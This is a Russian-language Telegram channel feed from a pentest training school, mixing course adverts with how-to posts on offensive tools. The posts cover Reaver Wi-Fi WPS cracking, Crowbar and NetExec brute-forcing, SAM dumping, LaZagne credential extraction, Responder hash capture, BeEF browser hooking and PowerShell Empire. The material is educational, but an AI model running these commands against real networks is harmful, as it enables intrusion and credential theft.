Киберкриминалист расследует цифровые преступления, ищет цифровые следы, восстанавливает данные и раскрывает кибератаки, делая виртуальный мир безопаснее 🔍
Освойте цифровую криминалистику на курсе от Академии Кодебай!😎 Стартуем 17 марта. Регистрация здесь.
Что будет на курсе?
🌟 Решение задач, основанных на APT-отчетах
🌟 Работа с opensource инструментами на протяжении полного цикла реагирования на инциденты
🌟 Поиск и анализ артефактов, оставленных хакерами и их вредоносным ПО
Для кого создан этот курс?
🔸 для аналитиков 1, 2 и 3 линий SOC
🔸 для для начинающих DFIR и Red Team специалистов
🔸 для организаций — повысить квалификацию сотрудников в сфере реагирования на КИ и форензики ОС семейства UNIX
🚀 По всем вопросам пишите @Codeby_Academy
Освойте цифровую криминалистику на курсе от Академии Кодебай!
Что будет на курсе?
Для кого создан этот курс?
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍8❤🔥5❤2😁2
Reaver Fork t6x
➡️ Как работает Reaver?
Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль.
1️⃣ Идентификация цели
Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования.
2️⃣ Перебор PIN-кодов
Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части:
• Перебор первых 4 цифр PIN-кода.
• Перебор последних 3 цифр.
Такой подход значительно сокращает общее количество комбинаций.
3️⃣ Обход защит
Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы:
• Задержки между попытками.
• Использование фальшивых MAC-адресов.
• Автоматическое возобновление атаки после блокировки.
4️⃣ Извлечение WPA/WPA2 пароля
После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi.
➡️ Установка и настройка Reaver
Утилита устанавливается из исходного кода с GitHub
➡️ Пример использования wash и reaver
🔍 Сканирование сетей с помощью wash
-i - выбор интерфейса для сканирования
-с - выбор канала
-С - игнорирование ошибок контрольной суммы кадров
🦴 Пример использования reaver
-i - выбор интерфейса
-b - MAC адрес цели
-v - более подробный вывод процесса работы
Reaver WPS Fork t6x — это инструмент для проведения атак на WPS (Wi-Fi Protected Setup), который помогает находить слабости в Wi-Fi сетях с включённой функцией WPS. Этот форк улучшает оригинальную утилиту Reaver, добавляя стабильность, производительность и новые функции.
Основной принцип работы Reaver заключается в переборе PIN-кодов WPS до нахождения правильного, что позволяет получить доступ к настройкам маршрутизатора и извлечь WPA/WPA2 пароль.
Перед началом атаки Reaver использует утилиту wash для поиска Wi-Fi сетей с включённой функцией WPS. Вы можете получить список доступных сетей, чтобы выбрать цель для тестирования.
Reaver последовательно отправляет PIN-коды к маршрутизатору, используя механизмы WPS. Атака разделяется на две части:
• Перебор первых 4 цифр PIN-кода.
• Перебор последних 3 цифр.
Такой подход значительно сокращает общее количество комбинаций.
Некоторые маршрутизаторы применяют защиту, блокируя WPS после нескольких попыток. Форк t6x добавляет функции, которые позволяют обходить эти механизмы:
• Задержки между попытками.
• Использование фальшивых MAC-адресов.
• Автоматическое возобновление атаки после блокировки.
После успешного подбора PIN, Reaver извлекает пароль сети, что позволяет подключиться к Wi-Fi.
Утилита устанавливается из исходного кода с GitHub
sudo apt install build-essential libpcap-dev aircrack-ng git
git clone https://github.com/t6x/reaver-wps-fork-t6x
cd reaver-wps-fork-t6x/src
./configure
make
sudo make install
root@kali:~# wash -i wlan0mon -c 6 -C
BSSID Ch dBm WPS Lck Vendor ESSID
------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No Unknown ASUS
-i - выбор интерфейса для сканирования
-с - выбор канала
-С - игнорирование ошибок контрольной суммы кадров
root@kali:~# reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
-i - выбор интерфейса
-b - MAC адрес цели
-v - более подробный вывод процесса работы
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥9❤8
Присоединяйтесь к команде Кодебай! Если заинтересовала вакансия, напишите нам на hh.ru — пришлите резюме + короткий рассказ, почему хотите в кибербезопасность!
#вакансии
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤7😁6🔥5
Сrowbar
Crowbar (ранее известный как Levye) — это инструмент для подбора паролей, который можно использовать во время тестов на проникновение. Он был разработан для подбора паролей некоторых протоколов другим способом в соответствии с другими популярными инструментами для подбора паролей. Например, в то время как большинство инструментов для подбора паролей используют имя пользователя и пароль для подбора паролей SSH, Crowbar использует ключ(и) SSH. Это позволяет использовать любые закрытые ключи, полученные во время тестов на проникновение, для атаки на другие серверы SSH.
📎 В настоящее время Crowbar поддерживает:
⏺️ OpenVPN
⏺️ Протокол удаленного рабочего стола (RDP) с поддержкой NLA
⏺️ Аутентификация закрытого ключа SSH
⏺️ Аутентификация ключа VNC
📌 Установка:
Есть 2 способа установки:
1️⃣
2️⃣
➡️ Запуск:
🖥 Для подбора пароля для SSH используем такую команду:
🖥 Для подбра пароля для RDP используем такую команду:
💡 Для указания файла нужно использовать заглавные буквы в ключах (-C /path/to/wordlist)
Crowbar (ранее известный как Levye) — это инструмент для подбора паролей, который можно использовать во время тестов на проникновение. Он был разработан для подбора паролей некоторых протоколов другим способом в соответствии с другими популярными инструментами для подбора паролей. Например, в то время как большинство инструментов для подбора паролей используют имя пользователя и пароль для подбора паролей SSH, Crowbar использует ключ(и) SSH. Это позволяет использовать любые закрытые ключи, полученные во время тестов на проникновение, для атаки на другие серверы SSH.
Есть 2 способа установки:
sudo apt install -y crowbar
git clone https://github.com/galkan/crowbar
pip3 install -r requirements.txt
crowbar --help
crowbar -b sshkey -k ~/.ssh/id_rsa -u kali -s 127.0.0.1/32
Где, -b - это то, что мы будем брутить
-k - конфигурационный файл (в нашем случае id_rsa)
-u - имя пользователя
-s - сервер куда мы подключаемся
crowbar -b rdp -s 127.0.0.1/32 -u Windowz -c 12345six
Где, -c - это пароль
Please open Telegram to view this post
VIEW IN TELEGRAM
2❤9👍6🔥3👎2
Аналитики FortiGuard Labs проанализировали вредоносные пакеты, обнаруженные с ноября 2024 года по настоящее время, и выявили различные методы, используемые злоумышленниками для эксплуатации уязвимостей системы.
😮 Было обнаружено:
1️⃣ 1082 пакета с малым количеством файлов, часто использующие минимальный код для выполнения вредоносных действий без обнаружения.
2️⃣ 1052 пакета содержат подозрительные установочные скрипты, предназначенные для скрытого внедрения вредоносного кода во время установки. Эти сценарии могут изменять стандартный процесс установки для выполнения вредоносных действий без ведома пользователя.
3️⃣ 1043 пакета без URL-адреса репозитория, что вызывает сомнения в законности и легитимности программного обеспечения. Злоумышленники могут избегать репозиториев, чтобы избежать проверки и предотвратить анализ кода, что снижает вероятность обнаружения.
4️⃣ 974 пакета, содержащие подозрительные URL-адреса, потенциально способствующие связи с серверами управления и контроля или утечке данных.
5️⃣ 681 пакет, использующий подозрительные API, в том числе такие команды, как
6️⃣ 537 пакетов с пустыми описаниями, что ещё больше скрывает их истинные намерения и повышает риск незамеченной вредоносной активности.
7️⃣ 164 пакета с необычно высокими номерами версий, которые вводят пользователей в заблуждение, заставляя их доверять устаревшему или потенциально опасному программному обеспечению.
https.get
и https.request
, для кражи данных или удалённого управления.Please open Telegram to view this post
VIEW IN TELEGRAM
2👍15🔥4❤3😱2🏆1
FEROXBUSTER
feroxbuster — это инструмент, предназначенный для выполнения принудительного просмотра.
Принудительный просмотр — это атака, целью которой является перечисление и доступ к ресурсам, на которые не ссылается веб-приложение, но которые все еще доступны злоумышленнику.
feroxbuster использует грубую силу в сочетании со списком слов для поиска несвязанного контента в целевых каталогах. Эти ресурсы могут хранить конфиденциальную информацию о веб-приложениях и операционных системах, такую как исходный код, учетные данные, внутренняя сетевая адресация и т. д.
Эта атака также известна как Predictable Resource Location, File Enumeration, Directory Enumeration и Resource Enumeration.
📌 Установка:
Имеется в наличии несколько способов:
1️⃣
2️⃣
📌 Запуск:
💡 Для перебора директорий и файлов, используем такую команду:
💡 Для перебора файлов с расширениями, используем команду с таким ключём:
💡 Для фильтрации кода ответа сервера, используйте команду с таким ключём:
💡 Для очень детального анализа, используйте такой ключ:
💡 Чтобы отфильтровать вывод по словам, используйте такую команду:
feroxbuster — это инструмент, предназначенный для выполнения принудительного просмотра.
Принудительный просмотр — это атака, целью которой является перечисление и доступ к ресурсам, на которые не ссылается веб-приложение, но которые все еще доступны злоумышленнику.
feroxbuster использует грубую силу в сочетании со списком слов для поиска несвязанного контента в целевых каталогах. Эти ресурсы могут хранить конфиденциальную информацию о веб-приложениях и операционных системах, такую как исходный код, учетные данные, внутренняя сетевая адресация и т. д.
Эта атака также известна как Predictable Resource Location, File Enumeration, Directory Enumeration и Resource Enumeration.
Имеется в наличии несколько способов:
sudo apt install -y feroxbuster
git clone https://github.com/epi052/feroxbuster
feroxbuster
feroxbuster --url http://localhost:80/
feroxbuster --url http://localhost:80/ -x php
feroxbuster --url http://localhost:80/ --filter-status 200
feroxbuster --url http://localhost:80/ --extract-links
feroxbuster --url http://localhost:80/ -W 5
Это не весь функционал этой утилиты, он намного обширнее!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤5🔥4
Критическая информационная инфраструктура (КИИ) в РФ: как защищают ключевые объекты? В новой статье рассказываем про то, как Россия защищает свою цифровую инфраструктуру в условиях растущего числа киберугроз.
Энергетика, транспорт, здравоохранение, финансы — всё это зависит от устойчивости КИИ. Но что скрывается за этим понятием? Какие угрозы существуют и как с ними борются?
В статье мы разбираем:
🔸 Что такое КИИ и почему это важно?
🔸 Основные методы защиты: технические, организационные и законодательные.
🔸 Роль ФСБ и ФСТЭК в регулировании безопасности.
🔸 Самые громкие киберинциденты на объектах КИИ.
🔴 Читайте статью и узнайте, что стоит за безопасностью ключевых объектов страны.
💥 Готовы внедрять 187-ФЗ на практике? Запишитесь на курс «Организация защиты информации на объектах КИИ».
Сертификация, аудит, защита от кибератак — стартуем 13 марта! Регистрация здесь.
Энергетика, транспорт, здравоохранение, финансы — всё это зависит от устойчивости КИИ. Но что скрывается за этим понятием? Какие угрозы существуют и как с ними борются?
В статье мы разбираем:
Сертификация, аудит, защита от кибератак — стартуем 13 марта! Регистрация здесь.
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍23🔥8❤7✍1
BeEF
BeEF — это сокращение от The Browser Exploitation Framework. Это инструмент для тестирования на проникновение, ориентированный на веб-браузер.
На фоне растущей обеспокоенности по поводу веб-атак на клиентов, включая мобильные клиенты, BeEF позволяет профессиональному тестировщику на проникновение оценить фактическое состояние безопасности целевой среды, используя векторы атак на стороне клиента. В отличие от других фреймворков безопасности, BeEF смотрит дальше защищенного периметра сети и клиентской системы и исследует эксплуатируемость в контексте одной открытой двери: веб-браузера. BeEF перехватит один или несколько веб-браузеров и будет использовать их в качестве плацдармов для запуска направленных командных модулей и дальнейших атак на систему из контекста браузера.
📌 Установка:
📌 Запуск:
Устанавилваем пароль для нового пользователя
Далее запускается демон
Для того чтобы "поймать браузер", используем демо страницу:
Далее вы увидите браузер в директории "Online Browsers" в левом углу программы.
Новая вкладка представляет подробности по браузеру, подцепленную страницу и подцепленный хост, а также обеспечивает новое меню из вкладок по выбранному браузеру.
📎 Модули имеют 3 цвета:
Зелёный - Он работает на выбраном браузере, работаем!
Ораньжевый - Он будет работать, но пользователь может это выявить.
Красный - На этом браузере модуль не сработает!
💡 С помощью этого иструмента вы сможете:
1️⃣ Осуществить сбор информации - Отпечатки браузеров, Информация, которую BeEF собирает по умолчанию с подцепленного браузера, Сбор информации о системе, Результат модуля Get System, Отпечатки пользовательского поведения
2️⃣ Осуществить атаку методом социальной инженерии - Запрос учётных записей, Перенаправление на другую страницу.
BeEF — это сокращение от The Browser Exploitation Framework. Это инструмент для тестирования на проникновение, ориентированный на веб-браузер.
На фоне растущей обеспокоенности по поводу веб-атак на клиентов, включая мобильные клиенты, BeEF позволяет профессиональному тестировщику на проникновение оценить фактическое состояние безопасности целевой среды, используя векторы атак на стороне клиента. В отличие от других фреймворков безопасности, BeEF смотрит дальше защищенного периметра сети и клиентской системы и исследует эксплуатируемость в контексте одной открытой двери: веб-браузера. BeEF перехватит один или несколько веб-браузеров и будет использовать их в качестве плацдармов для запуска направленных командных модулей и дальнейших атак на систему из контекста браузера.
sudo apt install -y beef-xss
sudo beef-xss
Устанавилваем пароль для нового пользователя
beef
Далее запускается демон
beef
и ссылка на порт на котором он запущен с web UI
.Для того чтобы "поймать браузер", используем демо страницу:
http://localhost:3000/demos/butcher/index.html
Далее вы увидите браузер в директории "Online Browsers" в левом углу программы.
Новая вкладка представляет подробности по браузеру, подцепленную страницу и подцепленный хост, а также обеспечивает новое меню из вкладок по выбранному браузеру.
Зелёный - Он работает на выбраном браузере, работаем!
Ораньжевый - Он будет работать, но пользователь может это выявить.
Красный - На этом браузере модуль не сработает!
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍15❤7🔥6👎1
Хотите стать пентестером и предотвращать кибератаки? 👀
Запишитесь на курс «Профессия Пентестер» от Академии Кодебай! Стартуем 24 марта — регистрация здесь.
Что вы получите?
🔸 Научитесь атаковать сети, WEB-сайты, ОС и устройства и проводить внутренний и внешний пентест
🔸 Освоите полный цикл пентеста: от Kali Linux до написания эксплойтов и обхода антивирусов.
🔸 Сможете участвовать в Bug Bounty программах или построить карьеру в информационной безопасности
Полный цикл обучения:
⌨️ от освоения Kali Linux и администрирования, до написания эксплойтов и шелл-кода, обхода антивирусных решений
⌨️ от сетевой разведки до эксплуатации уязвимостей, повышения привилегий и закрепления в сети
🚀 По всем вопросам пишите @Codeby_Academy
Запишитесь на курс «Профессия Пентестер» от Академии Кодебай! Стартуем 24 марта — регистрация здесь.
Что вы получите?
Полный цикл обучения:
Присоединяйтесь к Академии Кодебай – защищайте мир от угроз, находя уязвимости и предотвращая кибератаки!
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍17❤7🔥5✍2
Ищем в команду Backend-разработчика (удаленно) — прокачайте учебную платформу по кибербезопасности! 😎
⭐️ Почему мы?
🔸 Лидер в практическом обучении: наши лаборатории имитируют реальные атаки.
🔸 Инфраструктура для тысяч студентов и корпоративных клиентов.
🔸 Партнерство с топовыми IT-компаниями.
🔸 Гибкий график, удаленная занятость.
Задачи:
✅ Поддержка кластерной инфраструктуры (Proxmox, Docker/Kubernetes).
✅ Работа с контейнерами (оптимизация, обновление).
✅ Разработка веб-портала (Django, PostgreSQL, Keycloak).
✅ Автоматизация через GitLab CI/CD (тестирование, деплой).
✅ Интеграция новых инструментов (ELK, Prometheus).
Требования:
➡️ Опыт с Docker/Kubernetes, Django, CI/CD.
➡️ Знание аутентификации (Keycloak, OAuth).
➡️ Понимание сетевой безопасности.
➡️ Готовность разбираться в задачах пентеста/SOC.
Условия:
1️⃣ 15 часов/нед. 🔴 5-10 часов (поддержка).
2️⃣ Зарплата: 100–140 тыс. ₽.
3️⃣ Бесплатные курсы Академии.
Как откликнуться?
Присылайте резюме с примерами (Git/портфолио) + ответ на вопрос: «Как бы вы оптимизировали CI/CD?»
#вакансия
Задачи:
Требования:
Условия:
Как откликнуться?
Присылайте резюме с примерами (Git/портфолио) + ответ на вопрос: «Как бы вы оптимизировали CI/CD?»
#вакансия
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍16❤4🔥4👎1😁1🤔1
Запуск всех модулей с записью результатов в текстовый файл:
laZagne.exe all -oN
Запуск только определенного скрипта для браузера c целью извлечения паролей из firefox:
laZagne.exe browsers -firefox
Для расшифровки учетных данных домена можно указать пароль пользователя Windows, иначе будут перебраны уже найденные пароли Windows:
laZagne.exe all -password pass
-v - увеличить уровень детализации
-quiet - тихий режим без вывода информации на экран
Для извлечения Wi-Fi паролей\секретов Windows необходимо запускать программу с правами администратора. В случае запуска с административными привилегиями LaZagne удаётся получить пароли для других пользователей.
В Mac OS без пароля пользователя сложно восстановить пароли, хранящиеся на компьютере, поэтому рекомендуется запускать утилиту передавая её учетные данные пользователя.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21❤6🔥6🏆2
netexec
netexec - это инструмент эксплуатации сетевых служб, который помогает автоматизировать оценку безопасности крупных сетей.
💻 Установка:
1️⃣
Интрумент уже предустановлен в kali Linux, но вы можете скачать исходных код и запускать его.
2️⃣
🖥 Запуск:
⏺️ Для проверки активных хостов и открытых портов, пишем команду:
⏺️ Чтобы посмотреть активные сеансы:
⏺️ NetExec также способен выполнять атаки по сбору паролей и учетных данных:
⏺️ С помощью ключа -x мы можем выполнять команды:
⏺️ Создание дампа базы данных SAM
netexec - это инструмент эксплуатации сетевых служб, который помогает автоматизировать оценку безопасности крупных сетей.
Интрумент уже предустановлен в kali Linux, но вы можете скачать исходных код и запускать его.
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
netexec smb 127.0.0.1
netexec smb 127.0.0.1 -u {USERNAME} -p {PASSWORD} --sessions
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST}
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} -x 'net localgroup administrators'
netexec smb 127.0.0.1 -u {PATH_TO_WORDLIST} -p {PATH_TO_WORDLIST} --sam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍27❤6🔥5
Дистрибутивы линукс для пентестеров
В мире кибербезопасности дистрибутивы Linux играют ключевую роль в тестировании на проникновение. Эти специализированные операционные системы предлагают широкий набор инструментов для анализа уязвимостей и обеспечения безопасности.
Мы рассмотрим наиболее популярные дистрибутивы Linux для пентестеров и их особенности, чтобы знать больше о возможно полезных дистрибутивах.
💻 Kali Linux - дистрибутив Linux с открытым исходным кодом на базе Debian, предназначенный для решения различных задач информационной безопасности, таких как тестирование на проникновение, исследование безопасности, компьютерная криминалистика и обратная разработка. Наиболее частый выбор среди специалистов. Имеет множество полезных утилит и инструментов, не перегружен лишним.
💻 ParrotOS - дистрибутив Linux на базе Debian, ориентированный на безопасность, конфиденциальность и разработку. Также полулярный выбор среди пентестеров. Также имеет различные утилиты для проникновения, и хорошую стабильность на уровне Kali Linux.
💻 AthenaOS - это дистрибутив с открытым исходным кодом, основанный на Arch и Nix, предназначенный для создания новой концепции операционной системы для пентестинга. Такой выбор встречается намного реже, из-за не особой популярности дистрибутива.
💻 BlackArch - дистрибутив для тестирования на проникновение на базе Arch Linux, предоставляющий большое количество инструментов безопасности. Это дистрибутив с открытым исходным кодом, созданный специально для тестировщиков на проникновение и исследователей безопасности. Репозиторий содержит более 2800 инструментов, которые можно устанавливать по отдельности или группами. И из-за этого не пользуется популярностью, однако использование его в учебных целях, может изменить выбор в пользу именно этого дистрибутива в будущем.
💻 Pentoo - Live CD и Live USB, разработанные для тестирования на проникновение и оценки безопасности. Основанный на Gentoo Linux, Pentoo предоставляется как в виде 32- и 64-битного устанавливаемого live CD. Pentoo также доступен в виде оверлея для существующей установки Gentoo. Он включает в себя исправленные пакетной инъекцией драйверы Wi-Fi, программное обеспечение для взлома GPGPU и множество инструментов для тестирования на проникновение и оценки безопасности. Однако этот дистрибутив не пользуется популярностью, ибо он имеет крайне высокую нестабильность и сложность в использовании, а прирост производительности даёт небольшой.
В заключение, дистрибутивы Linux являются незаменимым инструментом для пентестеров, предлагая мощные средства для анализа безопасности и выявления уязвимостей. Попробуйте на практике представленные выше дистрибутивы и найдите своего фаворита.
В мире кибербезопасности дистрибутивы Linux играют ключевую роль в тестировании на проникновение. Эти специализированные операционные системы предлагают широкий набор инструментов для анализа уязвимостей и обеспечения безопасности.
Мы рассмотрим наиболее популярные дистрибутивы Linux для пентестеров и их особенности, чтобы знать больше о возможно полезных дистрибутивах.
В заключение, дистрибутивы Linux являются незаменимым инструментом для пентестеров, предлагая мощные средства для анализа безопасности и выявления уязвимостей. Попробуйте на практике представленные выше дистрибутивы и найдите своего фаворита.
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍12❤10🔥6
🚩 Новые задания на платформе HackerLab!
🏆 Категория Квесты — Логово хакера
🎢 Категория Разное — Это решится, даже если это не решится
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍17🔥5🎉4❤3
Responder
responder - это инструмент для выполнения атаки человек-посередине в отношении методов аутентификации в Windows. Эта программа включает в себя травитель LLMNR, NBT-NS и MDNS благодаря которому перенаправляется трафик с запросами и хешами аутентификации. Также в программу встроены жульнические серверы аутентификации HTTP/SMB/MSSQL/FTP/LDAP, которые поддерживают такие методы аутентификации как NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP и базовую HTTP аутентификацию, для которых Responder выполняет роль ретранслятора.
📌 Функции:
⏺️ Встроенный сервер аутентификации SMB.
⏺️ Встроенный сервер аутентификации MSSQL.
⏺️ Встроенный сервер аутентификации HTTP.
⏺️ Встроенный сервер аутентификации HTTPS.
⏺️ Встроенный сервер аутентификации LDAP.
⏺️ Встроенные серверы аутентификации FTP, POP3, IMAP, SMTP.
⏺️ Встроенный DNS сервер.
⏺️ Встроенный прокси сервер WPAD.
⏺️ Снятие отпечатков.
⏺️ Режим анализа.
📎 Для работы утилиты вводим такую команду:
responder - это инструмент для выполнения атаки человек-посередине в отношении методов аутентификации в Windows. Эта программа включает в себя травитель LLMNR, NBT-NS и MDNS благодаря которому перенаправляется трафик с запросами и хешами аутентификации. Также в программу встроены жульнические серверы аутентификации HTTP/SMB/MSSQL/FTP/LDAP, которые поддерживают такие методы аутентификации как NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP и базовую HTTP аутентификацию, для которых Responder выполняет роль ретранслятора.
sudo responder -I {NETWORK_INTERFACE*} -w On -r On -f On
Где, -I - IP-адрес для перенаправления, -w On - включаем проекси-сервер WPAD, -r On - ответы для netbios wredir, -f On - снятие отпечатков пальцев.
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍29❤7🔥5😱1
powershell-empire
Этот пакет содержит фреймворк постэксплуатации, который включает в себя чистый агент PowerShell2.0 Windows и чистый агент Python Linux/OS X. Это слияние предыдущих проектов PowerShell Empire и Python EmPyre. Фреймворк предлагает криптографически защищенные коммуникации и гибкую архитектуру. Со стороны PowerShell Empire реализует возможность запуска агентов PowerShell без необходимости powershell.exe, быстро развертываемые модули постэксплуатации, начиная от кейлоггеров и заканчивая Mimikatz, и адаптивные коммуникации для обхода обнаружения сети, все это упаковано в фреймворк, ориентированный на удобство использования.
💻 Установка:
1️⃣
Интрумент уже предустановлен в kali Linux, но вы можете скачать исходных код и запускать его.
2️⃣
🖥 Запуск:
⏺️ Команда ниже, запустит сервер powershell-empire:
⏺️ А такой командой мы сможем подключиться к клиенту:
📌 Далее нам предоставляется выбор "Слушателя", который принимает от нас команды:
⏺️ Синтаксис схож с Metasploit-Framework, мы можем менять параметры:
⏺️ Для запуска пишем:
⏺️ или мы можем запустить чат простой командой:
Этот пакет содержит фреймворк постэксплуатации, который включает в себя чистый агент PowerShell2.0 Windows и чистый агент Python Linux/OS X. Это слияние предыдущих проектов PowerShell Empire и Python EmPyre. Фреймворк предлагает криптографически защищенные коммуникации и гибкую архитектуру. Со стороны PowerShell Empire реализует возможность запуска агентов PowerShell без необходимости powershell.exe, быстро развертываемые модули постэксплуатации, начиная от кейлоггеров и заканчивая Mimikatz, и адаптивные коммуникации для обхода обнаружения сети, все это упаковано в фреймворк, ориентированный на удобство использования.
Интрумент уже предустановлен в kali Linux, но вы можете скачать исходных код и запускать его.
git clone https://gitlab.com/kalilinux/packages/powershell-empire
sudo powershell-empire -h
sudo powershell-empire server
sudo powershell-empire client
uselistener http
set Name AllesGut
set Port 80
execute
chat
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22🔥7❤6😁2🤔1
Как найти слабые места в веб-приложении до того, как их найдут хакеры?
Расскажем на курсе WAPT от Академии Кодебай!🛡 Это на 100% практический курс по пентесту, где вы попробуете изученные техники взлома в 65-ти заданиях нашей лаборатории!
🔴 Каждую неделю — вебинары с куратором! Стартуем 3 апреля. Регистрация здесь.
Содержание курса:
✦ эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг
✦ SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
✦ техники повышения привилегий, Client-side атаки (XSS, CSRF)
Получите практические навыки как в рабочих задачах, так и в Bug Bounty.🚀 По всем вопросам пишите @Codeby_Academy
Расскажем на курсе WAPT от Академии Кодебай!
Содержание курса:
✦ эксплуатация всех актуальных типов уязвимостей, активный / пассивный фаззинг
✦ SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
✦ техники повышения привилегий, Client-side атаки (XSS, CSRF)
Получите практические навыки как в рабочих задачах, так и в Bug Bounty.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤8🔥7😁1
Starkiller
Starkiller — это интерфейс для Powershell Empire. Это веб-приложение, написанное на VueJS. Начиная с Empire 5.0 и Starkiller 2.0 вам больше не нужно устанавливать Starkiller или собирать его из исходного кода. Он предварительно упакован в Empire как подмодуль и обслуживается через API Empire.
💻 Установка:
⏺️ Не требуется, однако можно скачать исходный код и запускать его:
🖥 Запуск:
💡 Утилита сама запустит вам браузер по адресу http://localhost:1337/index.html#/
⏺️ Нас встречает окно авторизации, входим:
💡 Теперь вы имеете удобный интерфейс для использования утилиты Powershell-empire, о котором мы писали ранее.
Starkiller — это интерфейс для Powershell Empire. Это веб-приложение, написанное на VueJS. Начиная с Empire 5.0 и Starkiller 2.0 вам больше не нужно устанавливать Starkiller или собирать его из исходного кода. Он предварительно упакован в Empire как подмодуль и обслуживается через API Empire.
git clone https://github.com/BC-SECURITY/Starkiller
cd Starkiller
startkiller
login: empireadmin
password: password123
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍9❤5🤔1
Username Anarchy - инструмент для создания имён пользователей. Полезен для подбора учётных записей и паролей методом перебора, а также для перечисления имён пользователей, если имена пользователей основаны на их фамилиях.
💻 Для установки необходимо клонировать репозиторий командой
🚀 Характеристики:
⏺️ Плагинная архитектура;
⏺️ Подстановки при неполных данных;
⏺️ Определения формата имени пользователя через строки формата;
⏺️ Базы данных стран с распространенными именами и фамилиями из Familypedia и PublicProfiler, что позволяет автоматически генерировать username заданной страны.
✏️ Примеры использования:
1️⃣ Известно только имя пользователя, а формат логина нет:
2️⃣ Знаем формат имени пользователя и сами имена (передаем списком в файле):
Полный список поддерживаемых утилитой форматов можно узнать командой
3️⃣ Знаем, что тестируемая организация находится в определенной стране (например, Китай). Программа автоматически сгенерирует список username характерных для заданного региона с разными форматами логинов:
4️⃣ Автоматическое распознавание используемого формата имени пользователя:
Используя флаг -F, можно определять собственный формат имени пользователя.
git clone https://github.com/urbanadventurer/username-anarchy
./username-anarchy vasya ivanov
./username-anarchy --input-file ./test-names.txt --select-format first.last
Полный список поддерживаемых утилитой форматов можно узнать командой
./username-anarchy --list-formats
./username-anarchy --country china --auto
./username-anarchy --recognise v.ivanov
Используя флаг -F, можно определять собственный формат имени пользователя.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥5🏆2
SSTImap: Утилита для обнаружения и эксплуатации уязвимостей SSTI
Основные возможности SSTImap
1️⃣ Обнаружение уязвимостей SSTI
SSTImap сканирует входные точки приложения, которые могут быть подвержены атаке SSTI. Это позволяет быстро определить, какие параметры или запросы являются потенциально небезопасными.
2️⃣ Поддержка популярных шаблонизаторов
Утилита поддерживает работу с различными движками шаблонов, включая:
▪️ Jinja2 (Python)
▪️ Twig (PHP)
▪️ Velocity (Java)
▪️ Smarty (PHP)
▪️ Freemarker (Java)
▪️ И другие.
3️⃣ Автоматизация проверки
Инструмент позволяет автоматизировать процесс проверки на наличие уязвимостей, используя заранее определенные полезные нагрузки для каждого типа движка шаблонов.
4️⃣ Эксплуатация уязвимостей
SSTImap может выполнять безопасную эксплуатацию для подтверждения уязвимости. Например, он способен внедрить команды, чтобы определить, насколько опасен выявленный вектор.
Установка SSTImap
➡️ Клонирование репозитория
➡️ Установка зависимостей
➡️ Запуск утилиты
SSTImap — это специализированный инструмент, предназначенный для выявления и эксплуатации уязвимостей Server-Side Template Injection (SSTI) в веб-приложениях. SSTI является одним из серьезных видов атак, которые позволяют злоумышленникам внедрять и исполнять произвольный код на стороне сервера через уязвимые шаблонизаторы. Этот инструмент упрощает процесс анализа безопасности веб-приложений, выявляя уязвимости, связанные с обработкой шаблонов.
Основные возможности SSTImap
SSTImap сканирует входные точки приложения, которые могут быть подвержены атаке SSTI. Это позволяет быстро определить, какие параметры или запросы являются потенциально небезопасными.
Утилита поддерживает работу с различными движками шаблонов, включая:
▪️ Jinja2 (Python)
▪️ Twig (PHP)
▪️ Velocity (Java)
▪️ Smarty (PHP)
▪️ Freemarker (Java)
▪️ И другие.
Инструмент позволяет автоматизировать процесс проверки на наличие уязвимостей, используя заранее определенные полезные нагрузки для каждого типа движка шаблонов.
SSTImap может выполнять безопасную эксплуатацию для подтверждения уязвимости. Например, он способен внедрить команды, чтобы определить, насколько опасен выявленный вектор.
Установка SSTImap
git clone https://github.com/epinna/SSTImap.git
cd SSTImap
pip install -r requirements.txt
python sstimap.py
Please open Telegram to view this post
VIEW IN TELEGRAM
👍27🔥9❤8👾2